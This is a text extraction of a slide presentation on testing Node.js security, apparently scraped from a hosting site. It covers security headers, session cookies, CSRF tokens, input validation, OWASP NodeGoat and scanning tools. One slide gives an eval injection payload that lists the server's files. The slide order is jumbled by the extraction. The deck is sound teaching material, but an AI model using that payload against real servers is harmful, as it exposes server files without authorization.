Hacking NodeJS applications for fun and profit Testing NodeJS - PowerPoint PPT Presentation
Hacking NodeJS applications for fun and profit Testing NodeJS Security by @jmortegac Agenda Introduction nodejS security Npm security packages Node Goat project Tools Node JS JavaScript in the backend Built on
Hacking NodeJS applications for fun and profit Testing NodeJS Security by @jmortegac
Agenda ▪ Introduction nodejS security ▪ Npm security packages ▪ Node Goat project ▪ Tools
Node JS ▪ JavaScript in the backend ▪ Built on Chrome´s Javascript runtime(V8) ▪ NodeJs is based on event loop ▪ Designed to be asynchronous ▪ Single Thread ▪ Node.js is resilient to flooding attacks since there’s no limit on the number of concurrent requests.
Security https://expressjs.com/en/advance d/security-updates.html updates
Package https://www.npmjs.com/advisories vulnerabilities
▪ Helmet Npm ▪ express-session security ▪ cookie-session packages ▪ csurf ▪ express-validator ▪ bcrypt-node ▪ express-enforces-ssl
Security HTTP Headers ▪ Strict-Transport-Security ▪ X-Frame-Options ▪ X-XSS-Protection ▪ X-Content-Type-Options ▪ Content-Security-Policy
▪ https://www.npmjs.com/package Helmet module /helmet
▪ https://github.com/helmetjs/helmet Helmet module
▪ hidePoweredBy Helmet module ▪ Hpkp → protection MITM ▪ Hsts → forces https connections ▪ noCache → desactive client cache ▪ Frameguard → protection clickjacking ▪ xssFilter → protection XSS
Helmet CSP
▪ http://cyh.herokuapp.com/cyh Check headers ▪ https://securityheaders.io/ security
Express ▪ https://www.shodan.io/ search?query=express versions
Disable x-powered-by
Disable ▪ Avoid framework x-powered-by fingerprinting
Disable ▪ Use Helmet and use “hide-powered-by” plugin x-powered-by
▪ https://www.npmjs.com/pack Sessions age/cookie-session management ▪ secure ▪ httpOnly ▪ domain ▪ path ▪ expires
httpOnly & secure:true
XSS attacks ▪ An attacker can exploit XSS vulnerability to: ▪ Steal session cookies/Sesion hijacking ▪ Redirect user to malicious sites ▪ Defacing and content manipulation ▪ Cross Site Request forgery
CSRF attacks
https://www.npmjs.com/package/csurf
app.use(function (request, response, next) { CSRF response.locals.csrftoken = request.csrfToken(); next(); }); <form action="/process" method=" POST "> <input type="hidden" name="_csrf" value="{{csrfToken}}"> <button type="submit">Submit</button> </form>
CSRF
Filter/sanitize user input ▪ Fixing XSS attacks ▪ https://www.npmjs.com/package/sanitizer ▪ Module express-validator ▪ https://www.npmjs.com/package/express-validator
Express Validator
▪ https://github.com/kelektiv/node.bcrypt.js Bcrypt-node
▪ http://nodegoat.herokuapp.com Node Goat /tutorial
▪ https://github.com/OWASP/Node Node Goat Goat
res.end(require('fs').read EVAL() dirSync('.').toString()) ATTACKS
Insecure Direct ▪ Use session instead of Object request param References ▪ var userId = req.session.userId;
Tools ▪ KrakenJS ▪ Lusca middleware ▪ NodeJsScan
http://krakenjs.com/
https://github.com/krakenjs/lusca
▪ https://github.com/ajinabra NodeJsScan ham/NodeJsScan
https://github.com/jmorteg NodeJsScan a/NodeJsScan/blob/maste r/rules.xml
NodeJsScan
GitHub repositories ▪ https://github.com/jmortega/testing_nodejs_security ▪ https://github.com/cr0hn/vulnerable-node ▪ https://github.com/rdegges/svcc-auth ▪ https://github.com/strongloop/loopback-getting-start ed-intermediate ▪ https://github.com/Feeld/strong-node
Node security ▪ https://www.udemy.com/nodejs-security- pentesting-and-exploitation/ learning
Books
References ▪ https://blog.risingstack.com/node-js-security-checklist/ ▪ https://blog.risingstack.com/node-js-security-tips/ ▪ https://www.npmjs.com/package/helmet ▪ https://expressjs.com/en/advanced/best-practice-security.html https://expressjs.com/en/advanced/security-updates.html ▪ http://nodegoat.herokuapp.com/tutorial ▪ https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goa ▪ t_Project
Recommend
More recommend
Explore More Topics
Stay informed with curated content and fresh updates.
Sambuz